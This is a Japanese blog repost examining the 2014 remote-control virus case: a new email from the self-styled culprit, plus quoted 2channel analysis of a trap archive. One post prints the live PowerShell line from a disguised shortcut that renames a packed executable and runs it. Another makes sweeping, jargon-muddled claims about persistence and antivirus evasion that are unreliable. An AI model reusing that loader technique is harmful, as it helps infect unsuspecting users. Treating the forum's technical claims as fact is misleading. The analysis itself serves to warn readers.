コメントする

今日の気になった一言(Quote)

簡単な考察 今回のメールには遠隔操作「真犯人」しか知りえない情報、秘密の暴露などはない。 前回以前の「真犯人」からのメールの送信時間帯(深夜帯・土日)とは一致している。 送り先は25名で前回のメールの送り先と一致。ただし、あて先を知っているのは、送り先(報道関係者・個人)の25人と、その送り先の関係者、捜査機関、onigoroshijuzoのヤフーアカウントに不正ログインした記者+不特定多数。結果として、あて先が完全に一致していからといって100%真犯人である証明にはならない。 Torを経由してYahoo!メール(Web)から送信されている。このあたりの手法も前回以前と一致。 今回のYahoo!のアカウントは onigoroshijuzo11111011110 。 11111011110 はバイナリで 2014 の意味。前回の河川敷のメールはonigoroshijuzo2014だった。2014/6/1 4:07現時点ではアカウントはまだ稼働中。ページのキャッシュ 矛盾点など その後は適当に逃げて捕まったら自分が真犯人かのように振る舞い無実を一転させ有罪、というシナリオです。

現実には片山氏は「適当に逃げて」おらず、自殺未遂後、自ら弁護士に連絡をした。警察も行動把握していなかった。 片山さんが自殺を試みたとの報道がありましたが、生きていてくれてよかったです。

せっかく用意したゲームでプレイヤーに死なれてゲームオーバーになったんじゃ話にならないので。

「真犯人」の指示で、自作自演で無実を一転させるよう仕向けだけなら、片山氏の自殺未遂の動機は?
メモ 便乗犯、愉快犯説 メールのあて先さえ入手できれば、第三者でも実現可能。 真犯人・協力者説 従来の「真犯人」メールと時間帯(深夜&土日)の傾向、torを利用している点などは一致。 遠隔操作事件の秘密の暴露などが一切ない為、100%「真犯人」だと確定できない。 片山氏による仕込み、自作自演説 片山氏が失踪中に河川敷での行動の言い逃れの為にこのシナリオを考えて、タイマーをセットしてから収監された? Yahoo!Webメールはtorを経由して自動送信する事は技術的に可能かどうかの検証が必要。(bot対策などで文字認証などが出てしまう可能性など) 今回のメールの内容には失踪時点で判明している情報だけなので、失踪中に作成する事は実現可能。 河川敷でのタイマー送信、捜査員の追跡、収監、今回のメールまで含めてすべて計画の一環だった?前回のタイマーでの逮捕はこれまでの慎重な真犯人と比較して、あまりにもずさんすぎて納得がいかない。との見方もあった。

関連リンク 真犯人がヒントで示しているスレッド ■おまけ

この前、2ちゃんねるにウイルスを貼ったら踏み台がたくさん集まりました。

なのでまたいつでもゲームを始めることも可能です。

ヒント:poverty1398836253

JC等数十人とコスプレセックスした挙句、ハメ撮り画像をインターネットで販売してたできる無職を逮捕

ウイルスについての指摘(?)と思われる投稿 http://ift.tt/1khFTcT

35 :番組の途中ですがアフィサイトへの転載は禁止です:2014/05/01(木) 02:00:00.83 ID:3I146ai20

»22

まとめ

rarの中身

 desktop.ini: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit, UPX compressed

 mov.lnk: MS Windows shortcut

 thumbs.db: Macromedia Flash Video

 mov.lnkの内容というかプロパティ↓

 C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe md ‘mov’ ;del ‘mov.lnk’ ;saps mov ;mv thumbs.db mov\mov.flv;sp mov\mov.flv attributes Archive;mv ‘desktop.ini’ ‘%temp%\x.exe’;saps ‘%temp%\x.exe’;

トラップのシナリオ

 ・解凍したらファイルが3つでてくる。

 ・そのうち「mov」と名前が付いてる、「フォルダのアイコン」をしたショートカットがトリガー

 ・こいつをダブルクリックとか「開く」とかやると

   ・desktop.ini を、c:\temp\x.exe という名前にリネーム移動

   ・そいつを実行

アウトとセーフ

 ・解凍しただけならセーフ

 ・というか、mov ショートカットに触ってなければ問題ない

 ・ショートカットをダブルクリックとか「開く」とかしたらアウト、シングルクリックは多分大丈夫

 ・XPならそもそも↓こんなものは存在しないのでセーフ。vista/7/8は知らん

   C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe

thumbs.db

 JCかJSのウェブカメラムービー。ニコ生かなんか?パンツも乳首もない、まあ普通の映像

http://ift.tt/1khFS8L

529 :番組の途中ですがアフィサイトへの転載は禁止です:2014/05/01(木) 03:23:35.26 ID:o7sFdkS+0

トレースしてみたが

これ想像以上にかなり悪質かも知れん。

まず、どっかと通信してるんだけど、

これがおそらく実行ファイル置き場。

今は何も置いてないみたいだから特に害はないが

この置き場に実行ファイルが置かれたら

勝手にPCにダウンロードして勝手に実行するようになってる模様。

さらにレジストリにも同時に書き込みをしており、

手動で消したところで「実行ファイルが消されたら新しい実行ファイルを生成」という

命令が出され、しかもファイル名を変えて実行ファイルが作成される。

vmcのサキュラバス関数をいじっており、

相当高難度なプログラムとなってる。

もっと分かりやすく箇条書きすると、

①現在のあらゆるウイルストフトでは探知出来ない

②ファイル置き場との通信を常に行っており、そこに悪質な実行ファイル置かれたらおしまい

③手動で消したところですでに常駐&レジストリいじりをされており、無駄

とりあえず、これから先、「何かされる」可能性が高いので

「今特に何も起こってないからセーフ」とは考えてはいけない。

「何かされる」のを防ぐ方法はある。PCの通信を遮断すること。

これなら現状のウイルスが常駐してようと、「成長」することはない。

情報はスマホやサブのノートPCなどで収集するといい。  【安部銃蔵】真犯人の名乗る人物からのまたメール(全文+ヘッダー) – satoru.netの自由帳 (via petapeta)
via Tumblr http://ift.tt/1khFTcV

コメントを残す

以下に詳細を記入するか、アイコンをクリックしてログインしてください。

WordPress.com ロゴ

WordPress.com アカウントを使ってコメントしています。 ログアウト /  変更 )

Google フォト

Google アカウントを使ってコメントしています。 ログアウト /  変更 )

Twitter 画像

Twitter アカウントを使ってコメントしています。 ログアウト /  変更 )

Facebook の写真

Facebook アカウントを使ってコメントしています。 ログアウト /  変更 )

%s と連携中

%d人のブロガーが「いいね」をつけました。